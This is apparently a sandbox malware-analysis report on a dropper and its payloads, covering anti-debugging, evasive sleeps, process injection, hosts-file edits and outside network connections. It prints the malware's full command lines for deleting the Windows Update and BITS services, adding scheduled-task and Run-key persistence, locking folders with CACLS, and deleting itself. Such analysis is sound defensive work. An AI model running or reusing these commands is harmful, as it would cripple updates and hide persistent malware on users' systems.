Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000000527D526 second address: 000000000527D559 instructions: 0x00000000 rdtsc 0x00000002 movsx dx, bh 0x00000006 dec cl 0x00000008 or edx, ecx 0x0000000a bts edx, ecx 0x0000000d xchg dh, dh 0x0000000f not cl 0x00000011 cbw 0x00000013 neg cl 0x00000015 bsf eax, eax 0x00000018 mov eax, 78B605B0h 0x0000001d or ah, FFFFFF9Eh 0x00000020 add cl, FFFFFF94h 0x00000023 xor bl, cl 0x00000025 or dh, dl 0x00000027 push ebp 0x00000028 inc ebp 0x00000029 cdq 0x0000002a cwd 0x0000002c push esi 0x0000002d push ebx 0x0000002e xor bp, di 0x00000031 cwd 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	RDTSC instruction interceptor: First address: 00007FF676941E5F second address: 00007FF676941E7F instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	RDTSC instruction interceptor: First address: 00007FF6768E9972 second address: 00007FF6768E99A1 instructions: 0x00000000 rdtsc 0x00000002 inc eax 0x00000003 rcr dh, FFFFFFDEh 0x00000006 pop esi 0x00000007 dec ecx 0x00000008 shl edi, cl 0x0000000a dec eax 0x0000000b cdq 0x0000000c pop ecx 0x0000000d dec ebp 0x0000000e movzx ecx, di 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 inc dx 0x00000018 inc ecx 0x00000019 pop edx 0x0000001a dec eax 0x0000001b cwde 0x0000001c ror ebx, cl 0x0000001e pop ebp 0x0000001f adc al, DDh 0x00000021 popfd 0x00000022 bswap dx 0x00000025 inc esp 0x00000026 movsx esi, bp 0x00000029 inc ecx 0x0000002a pop eax 0x0000002b inc ecx 0x0000002c sete ah 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	RDTSC instruction interceptor: First address: 00007FF675F42B33 second address: 00007FF675F42B4C instructions: 0x00000000 rdtsc 0x00000002 movzx edi, sp 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 not dx 0x0000000a inc ecx 0x0000000b pop ebp 0x0000000c inc ecx 0x0000000d pop esi 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 dec eax 0x00000011 movsx eax, sp 0x00000014 pop edi 0x00000015 dec ecx 0x00000016 movzx ebx, cx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	RDTSC instruction interceptor: First address: 00007FF675F9FC76 second address: 00007FF675F9FC96 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000106587EA second address: 0000000010658809 instructions: 0x00000000 rdtsc 0x00000002 ror cl, 1 0x00000004 ror edx, FFFFFF86h 0x00000007 xor ax, si 0x0000000a not cl 0x0000000c clc 0x0000000d xor bl, cl 0x0000000f push esi 0x00000010 push edi 0x00000011 rol dh, FFFFFF9Dh 0x00000014 rcl eax, cl 0x00000016 test bx, bx 0x00000019 push ebx 0x0000001a mov ebx, ecx 0x0000001c movsx eax, di 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\timeout.exe TID: 5640	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5784	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6044	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6048	Thread sleep time: -1440000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6040	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5784	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe TID: 2364	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5540	Thread sleep count: 9502 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856	Thread sleep time: -2767011611056431s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 360000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9502

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

API coverage: 3.2 %

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 360000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: rundll32.exe, 00000018.00000002.376729200.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi0ymi0ma.wclwox4jcqzsnqbjvsl_=;
Source: gntuud.exe, 0000000D.00000003.367227251.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 0000000D.00000003.367330103.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DQxttu2Qrr.exe	Binary or memory string: vmCi`
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: rundll32.exe, 00000018.00000003.368888031.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Code function: 0_2_61E354D1 sqlite3_os_init,GetSystemInfo,

0_2_61E354D1

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Tries to detect debuggers (CloseHandle check)

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Handle closed: DEADC0DE

Hides threads from debuggers

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\1000018002\avicapn32.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\1000018002\avicapn32.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugPort
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugPort
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

System information queried: KernelDebuggerInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.3 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 89.22.236.225 4193
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 85.209.135.109 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Section loaded: C:\Users\user\AppData\Local\Temp\jekppnay.tmp target: unknown protection: readonly

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory allocated: C:\Windows\SysWOW64\fontview.exe base: 32F0000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory allocated: C:\Windows\SysWOW64\fontview.exe base: 2D80000 protect: page read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 2D80000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: C:\Windows\System32\dialer.exe base: BE2470010
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: DFD008
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 32F0000
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 2D80000

.NET source code references suspicious native API functions

Source: 49.3.umciavi64.exe.f0d0000.0.unpack, ie.cs	Reference to suspicious API methods: ('nb', 'OpenProcess@kernel32.dll')
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, jb.cs	Reference to suspicious API methods: ('c', 'GetProcAddress@kernel32.dll'), ('a', 'LoadLibrary@kernel32.dll')
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, ud.cs	Reference to suspicious API methods: ('nb', 'OpenProcess@kernel32.dll')

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

File written: C:\Windows\System32\drivers\etc\hosts

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Thread register set: target process: 2240

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#qgoyddbo#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'rtkauduservice64.exe' /tr '''c:\users\user\locktime\rtkauduservice64.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\locktime\rtkauduservice64.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'rtkauduservice64.exe' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "rtkauduservice64.exe" /t reg_sz /f /d 'c:\users\user\locktime\rtkauduservice64.exe' }
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#qgoyddbo#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'rtkauduservice64.exe' /tr '''c:\users\user\locktime\rtkauduservice64.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\locktime\rtkauduservice64.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'rtkauduservice64.exe' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "rtkauduservice64.exe" /t reg_sz /f /d 'c:\users\user\locktime\rtkauduservice64.exe' }

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
